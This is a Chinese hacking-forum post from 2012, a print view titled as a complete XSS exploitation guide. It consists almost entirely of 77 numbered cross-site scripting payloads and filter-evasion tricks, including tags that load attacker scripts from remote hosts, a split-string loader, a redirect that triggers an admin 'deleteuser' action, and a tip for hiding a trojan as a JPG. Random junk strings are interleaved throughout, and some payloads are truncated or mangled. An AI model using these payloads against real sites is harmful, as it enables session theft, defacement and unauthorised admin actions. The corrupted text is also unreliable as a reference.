中国网络渗透测试联盟

标题: xss详细利用大全1 [打印本页]

作者: admin    时间: 2012-9-13 17:04
标题: xss详细利用大全1
跨站图片shell
- ^: H- r" T! k) @  d1 t) dXSS跨站代码  <script>alert("")</script>
2 x1 k; Y1 v( T: e( t6 z7 ^9 ^9 S; x
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
/ H) G$ t8 r& S4 ]: m
: G( B: ^4 j  e+ U
8 m; b4 ~8 J& l' X8 V
7 A5 ?! s$ W9 I& X5 ]2 K" r1)普通的XSS JavaScript注入& |1 r' s; o; v* }* r
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( D1 k+ f: A# y3 f/ j) g$ |$ j& b& j, Z! [$ ?
(2)IMG标签XSS使用JavaScript命令' P$ R1 a. Y# g* y
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 v' [- b9 H6 p7 c: g1 k# c; k5 e3 U$ I3 _0 l2 y
(3)IMG标签无分号无引号
7 E; H! {/ O9 {) t; E4 L<IMG SRC=javascript:alert(‘XSS’)>
/ N6 D( |( Q* P4 L) L( V; ?( C7 B5 v- E$ F- }( @7 @2 l" P
(4)IMG标签大小写不敏感1 q$ n6 Q2 E+ m) l$ d, ?- R* J
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>3 }& W5 C& n% o1 i: F1 D! E

5 [" }  A8 q5 i(5)HTML编码(必须有分号)+ J8 O  R% P4 v- p* {) U0 w  A
<IMG SRC=javascript:alert(“XSS”)>7 T9 I8 j5 B( D; Y! N3 ?+ t; |
* _/ y" s# v" _
(6)修正缺陷IMG标签
2 r; [( Q) s4 I3 g& A<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>2 e) ~( C7 U, Y2 q& v
6 M. X; ^/ B1 T( f
(7)formCharCode标签(计算器)
6 ?3 j$ H! _8 v# {<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>" I- r& a, m/ P

$ Z. R  q& n7 T( {& n(8)UTF-8的Unicode编码(计算器)( r2 o. s6 g. u0 u& z. }
<IMG SRC=jav..省略..S')>( M6 e* a7 |/ a' J! ]2 V
# b: z' {' l) b
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
! }: h5 g$ P, z' j# U  P<IMG SRC=jav..省略..S')>
) c( i* j! ?$ z5 z3 t! S
! Z  b3 F: \9 O. Q% w* T(10)十六进制编码也是没有分号(计算器)
1 ]: F, s5 o6 d% T( W<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>/ j! C* y, z: M

" Z/ L" G$ d+ {7 J* w" @(11)嵌入式标签,将Javascript分开
+ X) |; I3 x  D<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 b4 ?. w( d3 v( L3 ^
) m' O; P7 x% ^# \8 o* X7 t5 y(12)嵌入式编码标签,将Javascript分开2 l! o* ~, r1 S4 e! y  [
<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ b) C  m& _4 I1 N
$ Z# o1 m" y( z5 k! n6 W(13)嵌入式换行符; Q- w$ o0 W$ n0 v
<IMG SRC=”jav ascript:alert(‘XSS’);”>1 `1 a) F: W/ C! {6 A' o
* W2 }3 k3 w; `& _# b. K' O0 `
(14)嵌入式回车3 P' y, f! F* x$ f# e
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; i" t7 c3 s6 m# }6 z: O" {4 H4 v" e, g/ v8 L" x" X% \8 X
(15)嵌入式多行注入JavaScript,这是XSS极端的例子0 o" {% ]* t1 d, R
<IMG SRC=”javascript:alert(‘XSS‘)”>
' N$ o" E6 f- r5 |& T* U, e- J
/ w4 z7 ]5 P8 P" A(16)解决限制字符(要求同页面)
7 _: O" Q. r, M( a<script>z=’document.’</script>
/ x. i6 p) n% l3 t<script>z=z+’write(“‘</script>' |$ b, J- y: T# j4 m
<script>z=z+’<script’</script>
. p& c1 v- |; K  b<script>z=z+’ src=ht’</script>
( `/ I) Z; I$ H' q<script>z=z+’tp://ww’</script>  ^$ ~! ]/ H. b% E% U
<script>z=z+’w.shell’</script>
; C% p7 z$ T2 r0 w. k<script>z=z+’.net/1.’</script>
+ c- H  Q4 k/ j& A6 {! s6 }  {& ]<script>z=z+’js></sc’</script>, _/ x  `' E+ Q% I* f
<script>z=z+’ript>”)’</script>
; P' i' s& W3 F* G, u& v<script>eval_r(z)</script>+ T' q2 l3 `  R8 X5 s6 D7 {
1 n3 L! b# I. N( g
(17)空字符. N" B$ p! i4 J6 [$ v
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
' {# P1 N+ ?- j% s) b# r) \" C3 p5 A
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
0 R- N2 j7 [3 Z  x# G6 bperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out7 V9 }+ @5 s7 y5 L: X6 q

3 n1 P# ?% \9 Z: T(19)Spaces和meta前的IMG标签$ @$ b# j7 a9 F. G4 j
<IMG SRC=” javascript:alert(‘XSS’);”>
& m" I4 L+ a6 `" x- q, A! w7 J5 B, u& a3 \. n
(20)Non-alpha-non-digit XSS9 j. ?; Q) N( e4 P; x9 z$ i
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
4 [* c0 m& S9 ], l' H) e  |
; c5 o0 X/ q3 p' q( \( w3 {6 C) ~(21)Non-alpha-non-digit XSS to 2: d* w- S: T! l
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>! h3 C' |% t% y& H3 f6 E1 O
  b; W" g4 E! Y/ T$ l+ P
(22)Non-alpha-non-digit XSS to 3
9 P4 S. b4 p, Y# [  R$ f# C4 F. U, o<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& X% k: D9 q; i& ?2 E
# G4 f" M9 Y) Y& J* q(23)双开括号1 W' d0 E1 m6 Z- g
<<SCRIPT>alert(“XSS”);//<</SCRIPT>6 N0 }0 l4 t# ]6 L
$ H- B- e0 c* S( b$ u
(24)无结束脚本标记(仅火狐等浏览器)) b5 x) U2 b; T6 Z7 ^  ^
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
$ j, k: |) L7 T7 [& L8 ~( S' n  \/ F$ H
(25)无结束脚本标记2+ v' s  h- E5 |( U- p
<SCRIPT SRC=//3w.org/XSS/xss.js>6 l# t+ d  d+ i8 M4 Y7 n. ~; U# C

. I/ H  x1 l. v, ]6 r(26)半开的HTML/JavaScript XSS- x# N8 t0 D) L' F
<IMG SRC=”javascript:alert(‘XSS’)”1 K! z$ N) t! [4 d. x

6 A- ?$ l6 J" e7 [& c(27)双开角括号
8 ~. N, k5 s& m) m<iframe src=http://3w.org/XSS.html <
2 Y& A; [+ w- r( N
! u) h4 }! o, f$ T* J! D  y6 f$ [(28)无单引号 双引号 分号7 ~* y9 V& g$ m" B- \9 `, t6 v' ^
<SCRIPT>a=/XSS/
. Q& E7 v4 S" Dalert(a.source)</SCRIPT>% `" `2 D, K# C* o- N  U
& y6 G* Q4 p2 R6 s/ v4 Q
(29)换码过滤的JavaScript
: T1 E+ V* F4 a0 F( D1 d\”;alert(‘XSS’);//! H6 p9 y9 H' X2 Q. j  R0 m. Q

* ~( K& U/ ]$ l8 m" n5 K(30)结束Title标签
7 O, W2 @5 j! \* O; c7 C- e( W</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>& p; \, q; b6 H6 ?; K

* M! j: V! d, F(31)Input Image% d- M. d, R6 T7 M# ?
<INPUT SRC=”javascript:alert(‘XSS’);”>- i0 C! v1 O; G7 ~6 ^) S  U1 z

* ?1 c# ]1 w* U- S% f- h# A(32)BODY Image% n* a- N5 Y  O9 b: H7 @' B) Y
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>$ P- o) Y; J4 x) l* ]
- v1 O2 d: E8 P' T
(33)BODY标签* c7 t% l  \; ^
<BODY(‘XSS’)>/ U0 y3 W$ a6 L- s
7 n; n; s' v% F9 Y! _4 O: b
(34)IMG Dynsrc
  s) Z! q  H/ H0 l4 o# Z<IMG DYNSRC=”javascript:alert(‘XSS’)”>
+ T) {# [0 S( Y( I8 {
0 V# c  o; J$ ]1 x' S(35)IMG Lowsrc; B: }1 X9 w; P9 x5 `/ J' Z
<IMG LOWSRC=”javascript:alert(‘XSS’)”>0 s, ~, [' r2 \  F9 z' P
" B7 m# o8 ]' z7 L. \. o
(36)BGSOUND
0 R8 U! `0 O. a% {& E+ N. C<BGSOUND SRC=”javascript:alert(‘XSS’);”>/ c, i3 ~  `$ S- ?
# F* m; D: I$ F4 t. W
(37)STYLE sheet
( u, I; F8 b  n9 y0 x9 m<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
( R: T3 |, h0 |  u+ }3 s6 _- L( |* S( W; k3 h# d4 B0 Q- z
(38)远程样式表
( t0 r6 X! d; ^7 a" \( u% t<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>  H1 ]% P* g& G; b% I  q1 v  j

" x" \* o' P% Q. ~+ F9 m(39)List-style-image(列表式)& F+ n" |3 c* C5 I/ z5 G: j! `
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
; H$ H7 ?3 S* e) N- p
0 u3 V' j' H0 d1 [3 {( @5 U5 [(40)IMG VBscript* `' Z& g8 V9 e% T# `6 |( H
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
) @; p9 _4 N2 f9 B" G! H% }8 Y! i! p( ~3 g
(41)META链接url
& e6 V) p; J: A6 D7 g; c' ~<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>4 Z6 Z, s/ [+ l1 B& d
: O. }  {$ g, o/ r; i8 \
(42)Iframe' [" H: L/ X1 f* F6 R, s8 H/ y
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
3 F; S' `- a" M(43)Frame
- ?/ k- W8 |+ G) }<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>0 ]' m4 a# D4 J' r3 |

& O& l) d3 p- j, F4 j/ m(44)Table5 g: }% `2 c, D2 w
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>! b$ T7 J! m& ~

& N+ `* @1 F1 w+ n# ?(45)TD
. U6 j$ H$ c" a% z# g<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>, n1 h, v& I) v# V
! g- y' i; E- N' c
(46)DIV background-image
# c2 v& L2 D; A5 V7 }<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”># I) Z6 s3 e# _% ~! `$ z

2 r& e& X( A& N) \" `(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
/ c+ q9 V9 [* Q* o! p<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
* Y: M8 B6 i6 q% W8 k8 E' q3 a" c8 W) o# Z( V
(48)DIV expression& A; V3 R! p5 {5 L7 |9 K/ Z
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
) @4 N: h, G' ^7 |
! A3 u6 t: e! H(49)STYLE属性分拆表达7 h: d- C. U. W0 K" Y, k0 M
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
2 O1 C, a! @- g5 u1 h9 n9 O) e% N8 a9 h- W
* F9 N! P) W2 l  ^: i; Z(50)匿名STYLE(组成:开角号和一个字母开头)7 _% ]/ E# }! E/ y2 [* W
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>( U1 ^. I/ X1 M$ l$ v, l  [/ E

" I* F, _' y- @9 n(51)STYLE background-image
( B  ~: r6 d4 e  `. }! X7 u" d0 F6 n% P<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
: @1 j) u- l. e/ F
. e! i$ B; d8 B! L* |/ I- ^(52)IMG STYLE方式
3 q* x/ X. [& |3 g1 B1 N$ p7 Nexppression(alert(“XSS”))’>
" x& [! N+ `8 _/ v4 a; b; m7 A# q+ z8 S6 C1 V& R
(53)STYLE background. D; t. d! l) _
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
3 Q6 G. a; O& m3 P, u) E, w- T7 m# S% L1 u6 Z' U
(54)BASE
6 |% D% ^  Z2 D7 e) {<BASE HREF=”javascript:alert(‘XSS’);//”>
/ Q& J1 [; M# g, T) Q/ \: t' m  I5 c# f) ]/ g4 y6 [( i
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS8 i- h! i3 u+ r* E: O9 z
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
% D6 h- \+ x* D5 ?8 F) a( i# B5 Y* z7 j
(56)在flash中使用ActionScrpt可以混进你XSS的代码+ z4 O8 Q0 |  o6 ?% I: y
a=”get”;
( d1 s. T  U: x0 O" V) N  Hb=”URL(\”";
6 M1 f3 x% T( \. {c=”javascript:”;+ U$ ~: o: D/ y' C% P
d=”alert(‘XSS’);\”)”;
1 s! O9 V! z1 {8 Feval_r(a+b+c+d);
, r3 {2 T. l6 g) x  S2 i7 K
# w9 E+ H9 k; Y2 ^(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
. ~3 s* L7 j9 J/ i: I5 N<HTML xmlns:xss>
5 N, o- y; c# V, @! A<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”># l: |# T! Q& Q
<xss:xss>XSS</xss:xss>5 g& e& s7 ~" ~  M# t8 `
</HTML>. L$ {/ o% I, }4 g

- k, y* C5 L! {. @0 Y/ k(58)如果过滤了你的JS你可以在图片里添加JS代码来利用$ f6 M  L* d- n" f: s  I
<SCRIPT SRC=””></SCRIPT># ?- }7 h8 H4 q

' R: o6 v% m' C) i(59)IMG嵌入式命令,可执行任意命令
, R6 |+ N7 o6 i( \1 q# R. k, o# q3 h<IMG SRC=”http://www.XXX.com/a.php?a=b”>
0 ~& \$ M+ w+ v! Y6 R- i0 q1 `0 _1 V' |
(60)IMG嵌入式命令(a.jpg在同服务器). Y3 x* Q* t$ O. A
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
, E* O4 c. F4 h  w1 B4 z
4 C: ]! d/ L  i) X( x. \4 B(61)绕符号过滤  R7 R* Y! f, D# `' T- g; l
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
# V$ Q4 |: B+ G6 C7 o0 i7 G, R- F8 C0 x
(62)% p$ A0 G$ ?* W; j# V
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ m2 a/ X3 r  W4 [- X4 _
! P+ \1 Z% |6 W2 M2 p$ w(63)' m8 S* y3 }& S
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
- u  f" U$ A! O  W3 _4 b, Q. t0 Y  w4 M
(64)
" \% c) G; U0 Q2 b% |, Y<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
# @. F% a, c9 x* Q* B& k  P6 t  V4 B( Y" `
(65)! {' N( F2 v: i" j
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>7 z% O1 B/ J0 W, E3 H  p0 ~' W9 c7 @" e

4 Z7 w9 u1 Y) Y8 G2 X% M5 k! H(66)# _) d# _4 W7 G  P
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>4 O/ Z3 F- ~! X( V& m7 Y2 F* D
9 Z* c0 w" H8 A: ~0 E) s
(67)+ e% `" y0 ]5 w5 [, w# o/ E/ j
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
2 O6 |0 `, g6 |! w- U9 r+ s% Y
/ `# y+ |3 F/ r7 c4 a(68)URL绕行
# E: X; P: G2 U& C6 y' g8 `<A HREF=”http://127.0.0.1/”>XSS</A>: r/ ?7 w7 Y% n8 Z7 K
4 _- C- M9 |, z. A5 r
(69)URL编码5 z% D$ W9 L8 H
<A HREF=”http://3w.org”>XSS</A>: y% u1 E! X* s& H

* B! P) e/ J: x1 J(70)IP十进制
7 F# T5 X1 C+ m; f  ^4 @<A HREF=”http://3232235521″>XSS</A>$ T4 j/ j( Q, z& c/ k8 [$ u) W

2 N, S. q5 @; z( h6 A' E4 Q! a(71)IP十六进制
1 O- H9 ]3 G3 p( o<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
# _3 W( s+ ~+ y/ r2 X0 O, ^/ U) |1 T3 @" b
(72)IP八进制
6 w& h* K8 k3 b& `# P; C+ x<A HREF=”http://0300.0250.0000.0001″>XSS</A>
1 B' c+ s- _8 n* q4 y. x, `# ^0 g6 \4 p' u' Q" n
(73)混合编码% \% ?0 C4 ^( _
<A HREF=”h
4 s) {2 O) {& a, l& _1 i1 |tt p://6 6.000146.0×7.147/”">XSS</A>) H2 l, y5 {; P' b1 C0 X

9 U8 m2 z4 g+ [) o" A& f$ `  O  v. o(74)节省[http:]' D7 n+ x# m& H
<A HREF=”//www.google.com/”>XSS</A>
! A* j0 d9 }- w+ [/ ^( ?
, g! h& I; Y: |( J6 B. w(75)节省[www]3 c" N$ q. z$ J* w$ z8 j
<A HREF=”http://google.com/”>XSS</A>
5 e' i- @6 f0 g. Y3 _
2 w. V2 y9 p3 Z; r# |(76)绝对点绝对DNS
3 l( \% Q, z' t' y! r  b<A HREF=”http://www.google.com./”>XSS</A>
$ S% V0 Z1 V1 `7 f: T2 B1 K1 [3 R7 R8 Q0 L
(77)javascript链接
! M6 I, i& H5 q$ X& _  G0 F<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
2 A3 G& r* l) ^0 I+ y& l0 E' W




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2